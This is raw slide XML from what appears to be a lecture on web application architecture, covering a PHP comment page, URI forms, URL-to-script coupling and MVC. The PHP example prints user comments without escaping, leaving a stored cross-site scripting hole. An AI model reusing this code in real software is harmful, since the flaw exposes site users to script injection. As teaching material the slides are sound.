              <a:t> echo $_SESSION['loggedin2']; ?&gt;&lt;/span&gt;&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;h2&gt;Here are the comments&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comments.sqlite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$query = "select * from comments where username = '" . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>username_param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) . "';";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$res = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($query, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>if ($res)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   while ($entry = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($res, SQLITE_ASSOC)) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  &lt;p&gt;&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo $entry['comment']; ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /&gt;- &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($username); ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14509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URI – Absolute vs. Relative</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>URI can specify the absolute location of the resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>help.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Or the URI can specify a location relative to the current resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>/example/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>demo.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Relative to the current network-path (scheme)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>/test/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>help.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Relative to the current authority</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0" err="1"/>
              <a:t>people.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Relative to the current authority and path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Context important in all cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>http://localhost:8080/test</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29047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PHP code</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&lt;h2&gt;Make your voice heard!&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;form action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_comment.php?username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>urlencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($username); ?&gt;" method="POST"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> name="comment"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>textarea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;input type="submit" value="Submit" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	&lt;p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	  &lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>logout.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;Logout&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   ?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &lt;h1&gt;Error&lt;/h1&gt;&lt;p&gt; &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_error_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sqlite_last_error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>))); ?&gt; &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11659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Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How maintainable is this code?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine all the files are like this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You want to change how comments are stored, giving them extra metadata</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You must change every single SQL query in every PHP files that touches the comments, as well as all the outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML output intermixed with SQL queries intermixed with PHP code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35762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Tight Coupling of URLs to Scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The natural way to design a web application is to map every (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vaild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) URL to a specific script that gets executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs look like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_comment.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_comments.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/users/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_users.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And map directly to the following file structure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>add_comment.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_comments.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>users/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>view_users.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>secret.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is this necessary?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19210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2-04 at 3.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0"/>
            <a:ext cx="3944734" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16144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Model-View-Controller</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User Interface design framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A way to separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the concerns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of a GUI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Originally created in the early '90s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popularized by Ruby on Rails to structure the server-side code of web applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31844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36257" y="639683"/>
            <a:ext cx="5071486" cy="5578635"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5236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Separation of Concerns</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Handles all the "business logic" of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stores the application state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responsible for generating a view for the user of the data from the model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually a simple </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>templating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system to display the data from the model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Responsible for taking input from the user, fetching the correct data from the model, then calling the correct view to display the data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should be very simple</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5526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 Relational Mapping</a:t>
            </a:r>
          </a:p>
